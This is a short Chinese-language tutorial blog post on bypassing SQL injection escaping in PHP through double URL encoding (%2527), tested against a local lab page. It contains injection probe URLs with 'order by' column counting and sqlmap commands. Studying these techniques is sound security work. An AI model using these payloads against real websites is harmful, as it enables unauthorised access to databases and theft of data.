首页
学习
活动
专区
圈层
工具
发布
社区首页 >专栏 >1.4.2-SQL注入防御绕过-二次编码注入

1.4.2-SQL注入防御绕过-二次编码注入

作者头像
tea9
发布2022-07-16 16:28:02
发布2022-07-16 16:28:02
7690
举报
文章被收录于专栏:tea9的博客tea9的博客

01 二次编码注入原理

+,=,&,; 原始数据不适合传输

代码语言:javascript
复制
index.php?id=1&name=admin&pwd=123

name=admin=
name=admin&

admin=

php urldecode('%3d') --> =

// 如果这样的参数会引起歧义

php会自动解码

二次编码注入: urldecode()与PHP本身处理编码时,两者配合失误,可构造数据消灭\

02 二次编码注入方法

代码语言:javascript
复制
http://127.0.0.1/Less-1/double.php?id=1%2527 // 测试注入点
http://127.0.0.1/Less-1/double.php?id=1%2527%20order%20by%203 //测试长度
http://127.0.0.1/Less-1/double.php?id=1%27 order by 4--+
http://127.0.0.1/


sqlmap:
sqlmap -u "http://127.0.0.1/Less-1/double.php?id=1%25"

sqlmap -u "http://127.0.0.1/Less-1/double.php?id=1%2527" --current--+
本文参与 腾讯云自媒体同步曝光计划,分享自作者个人站点/博客。
如有侵权请联系 cloudcommunity@tencent.com 删除
目录
  • 01 二次编码注入原理
  • 02 二次编码注入方法
问题归档专栏文章快讯文章归档关键词归档开发者手册归档开发者手册 Section 归档